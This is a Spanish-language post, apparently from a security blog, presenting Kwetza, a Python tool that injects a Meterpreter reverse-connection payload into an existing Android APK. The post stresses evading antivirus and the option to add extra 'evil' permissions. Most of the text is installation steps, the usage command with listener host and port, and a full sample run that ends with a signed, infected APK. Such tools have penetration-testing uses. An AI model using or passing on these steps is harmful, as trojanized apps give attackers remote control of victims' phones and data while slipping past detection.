(https://s3.amazonaws.com/cp-s3/wp-content/uploads/2017/06/02225108/Infect-Android-Application-With-Meterpreter-Payload-kwetza.jpg)
Kwetza es una herramienta que le permite infectar una aplicación Android existente con un payload Meterpreter.
¿Qué hace?Kwetza infecta una aplicación Android existente con plantillas de payloads personalizadas o predeterminadas para evitar la detección por antivirus. Kwetza te permite infectar las aplicaciones de Android utilizando los permisos predeterminados de la aplicación de destino o inyectar permisos adicionales para obtener funcionalidad adicional.
Instalacióngit clone https://github.com/sensepost/kwetza.git
Kwetza está escrito en Python y requiere BeautifulSoup que se puede instalar usando Pip:
pip install beautifulsoup4
Kwetza requiere que Apktool sea instalado y accesible a través de su PATH. Esto se puede configurar usando las instrucciones de instalación que se encuentran aquí: https://ibotpeaches.github.io/Apktool/install
Modo de uso:python kwetza.py nameOfTheApkToInfect.apk LHOST LPORT yes/no
nameOfTheApkToInfect.apk =name of the APK you wish to infect.
LHOST =IP of your listener.
LPORT =Port of your listener.
yes =include "yes" to inject additional evil perms into the app, "no" to utilize the default permissions of the app.
python kwetza.py hackme.apk 10.42.0.118 4444 yes
[+] MMMMMM KWETZA
[*] DECOMPILING TARGET APK
[+] ENDPOINT IP: 10.42.0.118
[+] ENDPOINT PORT: 4444
[+] APKTOOL DECOMPILED SUCCESS
[*] BYTING COMMS...
[*] ANALYZING ANDROID MANIFEST...
[+] TARGET ACTIVITY: com.foo.moo.gui.MainActivity
[*] INJECTION INTO APK
[+] CHECKING IF ADDITIONAL PERMS TO BE ADDED
[*] INJECTION OF CRAZY PERMS TO BE DONE!
[+] TIME TO BUILD INFECTED APK
[*] EXECUTING APKTOOL BUILD COMMAND
[+] BUILD RESULT
############################################
I: Using APktool 2.2.0
I: Checking whether source shas changed...
I: Smaling smali folder into classes.dex
I: Checking whether resources has changed...
I: Building resources...
I: Copying libs ...(/lib)
I: Building apk file...
I: Copying unknown files/dir...
###########################################
[*] EXECUTING JARSIGNER COMMAND...
Enter Passphrase for keystore: password
[+] JARSIGNER RESULT
###########################################
jar signed.
###########################################
[+] L00t located at hackme/dist/hackme.apk
InformaciónKwetza ha sido desarrollado para trabajar con Python 2.
Kwetza usará por defecto la plantilla y el keystore ubicados en la carpeta "payload" para inyectar y firmar el apk infectado.
Si desea firmar la aplicación infectada con su propio certificado, genere un nuevo keystore y colóquelo en la carpeta "payload" y cambie el nombre al keystore existente o cambie la referencia en kwetza.py.
Lo mismo se puede hacer para las plantillas de payload.
La contraseña para el keystore predeterminado es, "password".
Descarga: https://github.com/sensepost/kwetza